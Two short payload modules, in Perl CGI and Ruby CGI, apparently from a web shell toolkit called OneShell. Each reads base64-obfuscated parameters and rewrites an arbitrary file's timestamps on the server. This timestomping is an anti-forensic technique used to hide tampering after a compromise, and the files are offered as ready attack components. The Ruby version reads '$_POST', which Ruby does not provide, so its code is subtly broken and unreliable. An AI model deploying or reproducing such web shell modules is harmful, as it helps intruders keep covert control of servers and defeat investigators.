File: Payload/Perl/CGI/OneShell/file_touch.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;

sub main {
    my $q = CGI->new;
    my $z0 = $q->param('z0') // '';
    my $z1 = $q->param('z1') // '';

    my $filename  = decode_base64($z0);
    my $timestamp = int(decode_base64($z1));

    if (!-e $filename) {
        print "0|File does not exist.";
        return;
    }

    if (utime($timestamp, $timestamp, $filename) == 1) {
        print "1|";
    } else {
        print "0|Failed to modify the timestamps";
    }
}

main();

File: Payload/Ruby/CGI/OneShell/file_touch.rb
require 'base64'

def main
  filename = Base64.decode64($_POST['z0'].to_s)
  timestamp = Base64.decode64($_POST['z1'].to_s).to_i

  unless File.exist?(filename)
    print "0|File does not exist."
    return
  end

  begin
    target_time = Time.at(timestamp)

    File.utime(target_time, target_time, filename)
    
    print "1|"
  rescue => e
    print "0|Failed to modify the timestamps"
  end
end

main